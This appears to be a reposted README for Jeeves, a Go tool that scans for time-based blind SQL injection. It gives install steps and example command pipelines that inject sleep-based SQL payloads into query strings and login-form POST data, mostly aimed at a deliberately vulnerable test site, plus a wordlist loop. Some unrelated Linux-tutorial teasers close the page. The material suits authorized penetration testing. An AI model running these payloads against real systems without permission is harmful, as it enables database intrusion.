Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
Installing Jeeves
$ go install github.com/ferreiraklet/Jeeves@latest
OR
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
echo ‘https://redacted.com/index.php?id=your_time_based_blind_payload_here’ | jeeves -t payload_time
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(10)))v)” | jeeves -t 10
In –payload-time you must use the time mentioned in payload
cat targets | jeeves --payload-time 5
Pay attention to the syntax! Must be the same =>
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -H “Testing: testing;OtherHeader: Value;Other2: Value”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 –proxy “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -p “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://ip:port” -H “User-Agent: xxxx”
Sending data through post request ( login forms, etc )
Pay attention to the syntax! Must be equal! ->
echo “https://example.com/Login.aspx” | jeeves -t 10 -d “user=(select(0)from(select(sleep(5)))v)&password=xxx”
echo “https://example.com/Login.aspx” | jeeves -t 10 -H “Header1: Value1” -d “username=admin&password=’+(select*from(select(sleep(5)))a)+'” -p “http://yourproxy:port”
You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
Command line flags
Usage:
-t, –payload-time, The time from payload
-p, –proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, –headers Custom Headers
-d, –data Sending Post request with data
-h Show This Help Message
Using with sql payloads wordlist
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done
Keeping your system credentials updated is one of the simplest ways to improve Linux security.…
A fresh Linux VPS may look ready to use immediately, but skipping the initial security…
If you want to host dynamic PHP websites or applications like WordPress, Laravel, or Magento,…
Java remains one of the most widely used programming platforms for servers, enterprise applications, Android…
Ubuntu users often download software directly from developer websites instead of using the default app…
Installing Ubuntu 26.04 LTS is only the first step toward building a smooth, secure, and…